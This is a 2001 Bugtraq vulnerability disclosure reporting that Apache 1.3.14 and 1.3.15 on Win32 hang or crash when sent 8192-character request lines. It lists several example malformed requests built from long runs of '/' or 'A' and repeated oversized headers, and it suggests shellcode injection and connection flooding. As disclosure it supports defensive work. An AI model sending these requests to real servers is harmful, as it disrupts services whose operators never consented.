[20200] in bugtraq
Apache Win32 8192 chars string bug
daemon@ATHENA.MIT.EDU (Auriemma Luigi)
Fri Apr 13 07:28:04 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.WNT.4.33.0104121355310.676-100000@ect004>
Date: Thu, 12 Apr 2001 13:56:49 +0200
Reply-To: Auriemma Luigi <kaino3@GENIE.IT>
From: Auriemma Luigi <kaino3@GENIE.IT>
To: BUGTRAQ@SECURITYFOCUS.COM
Credits: Auriemma Luigi <kaino3@genie.it>
I have found a little bug in some versions of Apache WebServer for
Win32.
I have tested 1.3.14 and 1.3.15 (default installation) on Win98SE and
Win2ksp1, and are
vulnerable; today I have tested an Apache 1.3.9 with ApacheJServ/1.0 and
it doesn't work (Access Forbidden), probably he want a string more or less
long.
The bug consist in sending a string of 8192 chars: (http command) <space>
string 0d 0a.
The string is 8190 byte long, the last 2 byte are the return code (0d 0a)
If anyone send this string, Apache give an error at the administrator, and
leave the connection alive in idle until the administrator close the crash
window that appear. And if we add 100 other 8192 chars string (for
example Accept: (8182 of "A")), the range of memory occupied by the string
is more. In Windows 98 if someone send 2 or more strings from different
connection, we have only a crash, but all the connections in idle; instead
in Win NT/2000 we have all the crashes and all the connections in idle. I
think that someone can use this bug in 2 or more methods:
1) Insert a shellcode in the string
2) Open a lot of connection with the 8192 chars string for saturate all
resources
Some examples:
1) GET (8184 of "/") /
2) HEAD /(8182 of "A") /
3) GET (8184 of "/") /
for 100 times:
Accept: (8182 of "/")
4) GET (8177 of "/") HTTP/1.0
5) All your fantasy!
Thanks for your attention.
